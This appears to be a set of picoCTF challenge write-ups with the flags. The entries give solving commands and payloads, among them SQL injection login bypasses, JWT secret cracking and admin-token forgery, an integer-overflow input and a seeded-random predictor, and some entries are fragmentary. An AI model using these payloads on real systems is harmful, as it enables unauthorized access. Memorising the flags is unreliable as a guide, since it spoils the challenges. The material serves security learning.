| 50 points
Author: Sanjay C/Danny Tunitis
Description
If I told you a word started with 0x70 in hexadecimal, what would it start with in ASCII?
0x70 = p
==picoCTF{p}==
Warmed Up
| 50 points
Author: Sanjay C/Danny Tunitis
Description
What is 0x3D (base 16) in decimal (base 10)?
==picoCTF{61}==
2Warm
| 50 points
Author: Sanjay C/Danny Tunitis
Description
Can you convert the number 42 (base 10) to binary (base 2)?
==picoCTF{101010}==
what's a net cat?
| 100 points
Author: Sanjay C/Danny Tunitis
Description
Using netcat (nc) is going to be pretty important. Can you connect to jupiter.challenges.picoctf.org at port 41120 to get the flag?
nc jupiter.challenges.picoctf.org 41120
==picoCTF{nEtCat_Mast3ry_3214be47}==
strings it
| 100 points
Author: Sanjay C/Danny Tunitis
Description
Can you find the flag in file without running it?
strings file | grep "picoC"
==picoCTF{5tRIng5_1T_7f766a23}==
Bases
| 100 points
Author: Sanjay C/Danny T
Description
What does this bDNhcm5fdGgzX3IwcDM1 mean? I think it has something to do with bases.
==picoCTF{l3arn_th3_r0p35}==
First Grep
| 100 points
Author: Alex Fulton/Danny Tunitis
Description
Can you find the flag in file? This would be really tedious to look through manually, something tells me there is a better way.
strings file | grep "picoC"
==picoCTF{grep_is_good_to_find_things_5af9d829}==
Based
| 200 points
Author: Alex Fulton/Daniel Tunitis
Description
To get truly 1337, you must understand different data encodings, such as hexadecimal or binary. Can you get the flag from this program to prove you are on the way to becoming 1337? Connect with nc jupiter.challenges.picoctf.org 29956.
| 200 points
Author: Alex Fulton/Danny Tunitis
Description
Sometimes you need to handle process data outside of a file. Can you find a way to keep the output from this program and search for the flag? Connect to jupiter.challenges.picoctf.org 4427.
| 300 points
Author: Danny
Description
I wrote you a song. Put it in the picoCTF{} flag format.
Pico's a CTFFFFFFF
my mind is waitin
It's waitin
Put my mind of Pico into This
my flag is not found
put This into my flag
put my flag into Pico
shout Pico
shout Pico
shout Pico
--- snippet---
==picoCTF{rrrocknrn0113r}==
flag_shop
| 300 points
Author: Danny
Description
There's a flag shop selling stuff, can you buy a flag? Source. Connect with nc jupiter.challenges.picoctf.org 9745.
#include <stdio.h>
#include <stdlib.h>
int main()
{
    setbuf(stdout, NULL);
    int con;
    con = 0;
    int account_balance = 1100;
    /* --- snippet --- */
            if(number_flags > 0){
                int total_cost = 0;
                total_cost = 900*number_flags;
                printf("\nThe final cost is: %d\n", total_cost);
                if(total_cost <= account_balance){
                    account_balance = account_balance - total_cost;
                    printf("\nYour current balance after transaction: %d\n\n", account_balance);
                }
                else{
                    printf("Not enough funds to complete purchase\n");
                }
    /* --- snippet --- */
            else if(auction_choice == 2){
                printf("1337 flags cost 100000 dollars, and we only have 1 in stock\n");
                printf("Enter 1 to buy one");
                int bid = 0;
                fflush(stdin);
                scanf("%d", &bid);
    /* --- snippet --- */
The account starts with a balance of 1100 and the flag costs 100000, so the two are far apart. The vulnerability can be reached if we manage to push the total cost to a negative value. But how? The problem is that we cannot enter a negative number of flags. How about an integer overflow?
3000000
==picoCTF{m0n3y_bag5_65d67a74}==
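The wraparound reasoned about above, worked through as an added example (not part of the original write-up or the challenge source): Python's ctypes models the 32-bit int arithmetic of the C excerpt, using the 900 price, the 1100 balance and the 3000000 input from this page. The function names and the hardened variant are assumptions for illustration.

```python
import ctypes

PRICE = 900               # per-flag price in the excerpt above
INT_MAX = 2**31 - 1       # largest value a 32-bit signed int can hold

def as_c_int(value):
    """Truncate to 32-bit two's complement, the wraparound assumed here.
    (Signed overflow is undefined behaviour in C; wrapping is the usual result.)"""
    return ctypes.c_int32(value).value

def buy_vulnerable(balance, number_flags):
    """Same checks as the excerpt: only number_flags > 0, then multiply."""
    if number_flags <= 0:
        return balance, None
    total_cost = as_c_int(PRICE * number_flags)
    if total_cost <= balance:                 # a negative cost always passes
        balance = as_c_int(balance - total_cost)
    return balance, total_cost

def buy_checked(balance, number_flags):
    """Hardened variant (assumption): bound the quantity before multiplying."""
    if number_flags <= 0 or number_flags > INT_MAX // PRICE:
        raise ValueError("quantity out of range")
    total_cost = PRICE * number_flags
    if total_cost > balance:
        raise ValueError("not enough funds")
    return balance - total_cost, total_cost

if __name__ == "__main__":
    print(buy_vulnerable(1100, 3000000))      # (new balance, wrapped cost)
    try:
        buy_checked(1100, 3000000)
    except ValueError as err:
        print("rejected:", err)
```

The same bound, `number_flags > INT_MAX / 900`, is the check the C code would need before the multiplication.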
1_wanna_b3_a_r0ck5tar
Description
I wrote you another song. Put the flag in the picoCTF{} flag format
==picoCTF{BONJOVI}==
Forensics
Glory of the Garden
| 50 points
Tags:
Author: jedavis/Danny
Description
This garden contains more than it seems.
strings file
==picoCTF{more_than_m33ts_the_3y33dd2eEF5}==
So Meta
| 150 points
Tags:
Author: Kevin Cooper/Danny
Description
Find the flag in this picture.
strings filename
exiftool filename
==picoCTF{s0_m3ta_d8944929}==
Shark on wire 1
| 150 points
Tags:
Author: Danny
Description
We found this packet capture. Recover the flag.
The flag is in a UDP stream: follow the UDP stream in the capture to get the flag.
==picoCTF{StaT31355_636f6e6e}==
extensions
| 150 points
Tags:
Author: Sanjay C/Danny
Description
This is a really weird text file TXT? Can you find the flag?
tesseract f.png outputbase
==picoCTF{now_you_know_about_extensions}==
What Lies Within
| 150 points
Tags:
Author: Julio/Danny
Description
There's something in the building. Can you retrieve the flag?
zsteg imge
==picoCTF{h1d1ng_1n_th3_b1t5}==
m00nwalk
| 250 points
Tags:
Author: Joon
Description
Decode this message from the moon.
Use qsstv to receive the sound and convert it into an image.
==picoCTF{beep_boop_im_in_space}==
WhitePages
| 250 points
Tags:
Author: John Hammond
Description
I stopped using YellowPages and moved onto WhitePages... but the page they gave me is all blank!
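from pwn import *
# Read the "blank" file as raw bytes.
with open("whitepages.txt", "rb") as bin_file:
    data = bytearray(bin_file.read())
# EM SPACE (E2 80 83) stands for bit 0, a plain space (20) for bit 1.
data = data.replace(b'\xe2\x80\x83', b'0')
data = data.replace(b'\x20', b'1')
data = data.decode("ascii")
# unbits() packs the bit string back into bytes.
print(unbits(data))
E2 80 83 = 0
20 = 1
Convert every whitespace character to its bit, then decode the bits as ASCII.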
Author: Danny
Description
We found this file. Recover the flag.
==picoCTF{c0rrupt10n_1847995}==
like1000
| 250 points
Tags:
Author: Danny
Description
This .tar file got tarred a lot.
PWN
seed-sPRiNG
| 350 points
Tags:
Author: John Hammond
Description
The most revolutionary game is finally available: seed sPRiNG is open right now! seed_spring. Connect to it with nc jupiter.challenges.picoctf.org 34558.
The seed is taken from the current time, so we need to build a generator that uses the same seed and send its output to the service.
//solve.c
//gcc -o solve solve.c
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
int main ()
{
    int i;
    /* Seed with the current time, the same way the service does. */
    srand(time(0));
    for (i = 0; i < 30; i++)
    {
        printf("%d\n", rand() & 0xf);
    }
    return 0;
}
//./solve | nc jupiter.challenges.picoctf.org 34558
Do you think you can log us in? Try to see if you can login!
/support.html
Hi. I tried adding my favorite Irish person, Conan O'Brien. But I keep getting something called a SQL Error
Can you help me find my parents. I think they were Irish.
The SQL error points to SQL injection. Let's try injecting in the password field.
' or '1'='1' --
==picoCTF{s0m3_SQL_c218b685}==
Irish-Name-Repo 2
| 350 points
Tags:
Author: Xingyang Pan
Description
Someone has bypassed the login before, and now it's being strengthened. Try to see if you can still login!
admin'--
It only filters the password, not the username, so injection is still possible.
==picoCTF{m0R3_SQL_plz_fa983901}==
Irish-Name-Repo 3
| 400 points
Tags:
Author: Xingyang Pan
Description
Try to see if you can login as admin!
Use curl with the debug parameter to see what the login operation does.
curl IP --data "password=test&debug=1"
It turns out the password is encoded with ROT13 before it is used, so the payload has to be ROT13-encoded first:
' or 1=1'-- to ' be 1=1--'
==picoCTF{3v3n_m0r3_SQL_06a9db19}==
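Why all three Irish-Name-Repo logins fall to the inputs quoted above, and what stops them, as an added example (not the challenge's code): an in-memory SQLite login built by string concatenation next to the same login with placeholders. The table layout, the stored password and the function names are constructed assumptions; the Repo 3 input is written here as the ROT13 of `' or 1=1--`.

```python
import codecs
import sqlite3

def make_db():
    # Constructed sample data; the real schema is not shown on this page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def login_concat(db, name, password, rot13=False):
    """Vulnerable pattern: user input is pasted into the SQL text."""
    if rot13:  # Irish-Name-Repo 3 style: ROT13 applied before the query
        password = codecs.encode(password, "rot13")
    sql = f"SELECT name FROM users WHERE name='{name}' AND password='{password}'"
    return db.execute(sql).fetchone()

def login_param(db, name, password, rot13=False):
    """Fixed pattern: placeholders keep input as data, never as SQL."""
    if rot13:
        password = codecs.encode(password, "rot13")
    sql = "SELECT name FROM users WHERE name=? AND password=?"
    return db.execute(sql, (name, password)).fetchone()

# (username, password, rot13) for the three write-ups above.
CASES = [
    ("x", "' or '1'='1' --", False),   # Repo 1: injected via the password
    ("admin'--", "anything", False),   # Repo 2: injected via the username
    ("x", "' be 1=1--", True),         # Repo 3: decodes to ' or 1=1--
]

def compare():
    """Return (concat_logged_in, param_logged_in) for each case."""
    db = make_db()
    return [(login_concat(db, *case) is not None,
             login_param(db, *case) is not None) for case in CASES]

if __name__ == "__main__":
    for case, result in zip(CASES, compare()):
        print(case, "->", result)
```

Filtering one field (Repo 2) or transforming the input (Repo 3) leaves the concatenated query injectable; only the placeholder version rejects all three.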
JaWT Scratchpad
| 400 points
Tags:
Author: John Hammond
Description
Check the admin scratchpad!
We cannot log in as admin, but we can log in as anybody else.
Change the JWT cookie from our name to admin.
Use JWT.io to decode the token.
Use JtR to crack the sha256 secret.
Change user to admin.
Weak credential - ilovepico
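Why the weak secret matters, as an added example (not code from the challenge or the original write-up): HS256 signing and verification with Python's standard library, plus an audit helper that checks whether a token's signing key appears in a wordlist. The `user` claim name, the sample payload and the wordlist are constructed assumptions; `ilovepico` is the secret named above.

```python
import base64
import hashlib
import hmac
import json
import secrets

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def sign_hs256(payload: dict, key: bytes) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"

def verify_hs256(token: str, key: bytes) -> bool:
    signing_input, _, sig = token.rpartition(".")
    expected = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(sig, b64url(expected))

def guessable_key(token: str, wordlist):
    """Audit helper: return the wordlist entry that verifies the token, if any."""
    for word in wordlist:
        if verify_hs256(token, word.encode()):
            return word
    return None

# Constructed wordlist; the last entry is the secret named in the write-up.
WORDLIST = ["password", "letmein", "ilovepico"]

def demo():
    weak = sign_hs256({"user": "john"}, b"ilovepico")
    strong = sign_hs256({"user": "john"}, secrets.token_bytes(32))
    # Whoever knows the key can sign any claim, so a guessable key
    # means the "user" field is effectively attacker-controlled.
    return guessable_key(weak, WORDLIST), guessable_key(strong, WORDLIST)

if __name__ == "__main__":
    print(demo())
```

A key drawn from `secrets.token_bytes(32)` has no wordlist to be found in, which is the fix for this class of bug.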
Author: John Johnson
Description
The image link appears broken..
Java Script Kiddie 2
| 450 points
Tags:
Author: John Johnson
Description
The image link appears broken... twice as badly...
Resources Tools
https://codewithrockstar.com/online
https://deobfuscate.relative.im/
Rockstar esolang. Decode it.
| 350 points
Author: Alex Bushkin
The Rockstar language has changed since this problem was released! Use this Wayback Machine URL to use an older version of Rockstar, here.
Open the browser and try to get the flag.
You're not Picobrowser! Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0